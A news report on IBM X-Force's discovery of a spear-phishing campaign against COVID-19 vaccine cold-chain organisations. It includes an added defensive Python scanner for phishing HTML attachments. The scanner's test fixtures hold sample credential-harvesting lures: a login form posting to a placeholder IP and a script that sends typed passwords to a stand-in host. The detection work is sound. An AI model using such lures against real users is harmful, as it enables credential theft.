Hackers “assumed to be state agents” have been waging a phishing campaign against pharmaceutical firms and other institutions involved in the forthcoming distribution of a vaccine against the novel coronavirus, IBM announced on Thursday.
In a post on Security Intelligence releasing their findings, IBM Security X-Force researchers wrote that “precision targeting of executives and key global organizations hold the potential hallmarks of a nation-state tradecraft,” adding the unknown hackers likely sought to obtain “advanced insight into the purchase and movement of a vaccine that can impact life and the global economy.” The target, according to IBM, appears to be the “cold chain”—a term for the logistics network that allows vaccines and other drugs to be carried from point of manufacture to distribution in temperature-controlled shipping containers. What the attackers hoped to accomplish is unknown, with possible motives ranging from theft of technology to intel that could be used to undermine trust in the vaccine or disrupt distribution.
IBM researchers wrote that the attackers targeted organizations in at least six countries, using tactics such as impersonating a Haier Biomedical executive to send spear-phishing emails, in some cases aimed at organizations' help and support pages. Many of the targets were linked to the international vaccine alliance Gavi's cold chain program and included European Union bodies key to vaccine distribution, UNICEF, companies that manufacture solar panels used in cold storage, and IT security firms that serve pharmaceutical companies:
The targets included the European Commission’s Directorate-General for Taxation and Customs Union, as well as organizations within the energy, manufacturing, website creation and software and internet security solutions sectors. These are global organizations headquartered in Germany, Italy, South Korea, Czech Republic, greater Europe and Taiwan.
The spear-phishing emails carried malicious HTML attachments that displayed a login prompt; credentials typed into it were sent to the attackers. Pfizer and Moderna, the two pharmaceutical firms whose vaccines are expected to begin rollout shortly in the U.S., did not appear to be targeted, according to the New York Times, nor are any other U.S. firms known to have been targeted.
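The mechanism described above, an HTML attachment carrying a fake login form that submits whatever is typed into it to an attacker-controlled server, can be screened for before the attachment reaches a mailbox. The Python script below is an added example written for this article; it is not code from IBM X-Force, from the campaign, or from any vendor. The trusted-domain list, the sample attachments and the hosts inside them (a TEST-NET address and an example.net name) are constructed placeholders, not indicators from the actual campaign.

```python
"""Screen an e-mail HTML attachment for credential-harvesting behaviour.

Added example, not from the original article or from IBM X-Force.  Heuristic:
an HTML attachment whose password field submits to a host outside the
recipient organisation's domains (or to a raw IP), or whose script posts data
to such a host, is treated as a probable phishing lure.  Samples are constructed.
"""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the recipient organisation's own domains (placeholder value).
TRUSTED_DOMAINS = {"example-pharma.com"}

_URL_RE = re.compile(r"""https?://[^\s'"<>]+""")
# Calls that submit data from script rather than through a <form>.
_SUBMIT_RE = re.compile(r"(fetch\(|XMLHttpRequest|\.ajax\(|sendBeacon\()")


class _Scanner(HTMLParser):
    """Collect forms (and whether each holds a password field) plus script text."""

    def __init__(self):
        super().__init__()
        self.forms = []        # each: {"action": str, "has_password": bool}
        self.scripts = []
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self._form is None:
                # Password field outside any form: it can only be submitted by script.
                self.forms.append({"action": "", "has_password": True})
            else:
                self._form["has_password"] = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def host_is_untrusted(url):
    """True if the URL's host is a raw IP address or lies outside TRUSTED_DOMAINS."""
    host = urlparse(url).hostname
    if not host:
        return False            # relative URL: no host to judge
    try:
        ipaddress.ip_address(host)
        return True             # a login form posting to a bare IP is a red flag
    except ValueError:
        pass
    return not any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)


def scan_html_attachment(html):
    """Return a list of findings; an empty list means nothing suspicious."""
    scanner = _Scanner()
    scanner.feed(html)
    findings = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        if not form["action"]:
            findings.append("password field with no form action (submission via script)")
        elif host_is_untrusted(form["action"]):
            findings.append("password form posts to untrusted host: " + form["action"])
    script_text = "\n".join(scanner.scripts)
    if _SUBMIT_RE.search(script_text):
        for url in _URL_RE.findall(script_text):
            if host_is_untrusted(url):
                findings.append("script sends data to untrusted host: " + url)
    return findings


# Constructed samples (placeholder hosts, not indicators from the campaign).
PHISH_SAMPLE = """<html><body>
<p>Your session has expired. Sign in to view the shipment document.</p>
<form method="post" action="https://203.0.113.10/login.php">
  <input name="email" type="text"><input name="pass" type="password">
  <input type="submit" value="Sign in">
</form></body></html>"""

JS_SAMPLE = """<html><body>
<input id="u"><input id="p" type="password"><button onclick="go()">Open</button>
<script>
function go(){fetch("https://docs-portal.example.net/c",{method:"POST",
  body:JSON.stringify({u:u.value,p:p.value})});}
</script></body></html>"""

BENIGN_SAMPLE = """<html><body><h1>Shipment schedule</h1>
<table><tr><td>Lot 1</td><td>Week 49</td></tr></table></body></html>"""

if __name__ == "__main__":
    for name, sample in [("phish", PHISH_SAMPLE), ("js", JS_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        print(name, scan_html_attachment(sample))
```

The two lure samples cover the two ways such an attachment exfiltrates input: a plain HTML form whose `action` points at the attacker, and a form-less page whose script posts the fields itself. A gateway rule built on this would quarantine rather than block outright, since legitimate HTML attachments with login forms posting to the organisation's own single sign-on host pass the domain check.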
The IBM researchers added in the release that a nation-state is the most likely explanation because there is no clear “cash out” for cyber-criminals, other than the possibility that knowledge of vaccine shipping routes and safe storage requirements could be sold as a “hot black-market commodity.” It is also possible the hackers were interested in using stolen credentials to stage ransomware attacks against the computer-controlled shipping containers. According to the Washington Post, it is not clear whether any of the phishing attempts succeeded.
“This activity took place in September, which means that someone’s looking to get ahead, looking to be where they need to be at the critical moment,” IBM Security X-Force senior cyber threat analyst Claire Zaboeva told Wired. “... The door is really open. Once you get the keys to the kingdom, and you’re inside the city walls or on the network, there’s a myriad of objectives that you can attain, whether it’s critical information—like timetables and distribution—or disruptive attacks.”
Per the Times, federal officials said the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) will respond to IBM’s alert by notifying agencies involved in Operation Warp Speed, the U.S. effort to develop and distribute a vaccine. CISA coronavirus strategist Josh Corman told the Times there is a need for stepped-up “cybersecurity diligence at each step in the vaccine supply chain” and for institutions “involved in vaccine storage and transport to harden attack surfaces, particularly in cold storage operation.”